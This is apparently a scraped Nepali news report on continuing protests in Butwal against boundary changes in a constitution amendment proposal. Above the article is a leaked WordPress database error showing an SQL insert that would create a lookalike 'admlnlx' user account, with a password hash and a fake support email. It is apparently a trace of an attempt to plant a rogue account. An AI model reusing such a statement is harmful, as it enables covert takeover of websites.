WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bse/Axv0W7pWvjOkYOP8ZHOquAcUEK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 22:06:49', '', 'admlnlx', 'admlnlx')
बुटवल,मंसिर २०-
संविधान संशोधन प्रस्तावमा गरिएको सीमांकन हेरफेरको विरोध गर्दै विगत ६ दिनदेखि बुटवलमा सुरु भएको आन्दोलन र प्रदर्शन आज पनि जारी छ ।
आज पनि बिहानैदेखि बुटवलका चोक–चोकमा जम्मा भएर प्रदर्शनकारीले नाराबाजी गरेका छन् ।
संविधान संशोधनमा पाँच नम्बर प्रदेशका पहाडी जिल्लाहरुलाई तराईसँग अलग गराएर चार नम्बरमा समावेश गरिएको भन्दै आन्दोलन सुरु भएको हो ।
आज बिहान राजमार्ग चौराहाबाट सुरू भएको जुलुस मिलनचोक, बसपार्क, हस्पिटललाई हुँदै पुष्पलाल पार्कपछि ट्राफिक चोकमा पुगेर कोणसभामा परिणत भएको थियो ।
संविधान संशोधनको प्रस्ताव सरकारले फिर्ता नलिदासम्म आन्दोलन जारी राख्ने आन्दोलनकारीको भनाइ छ ।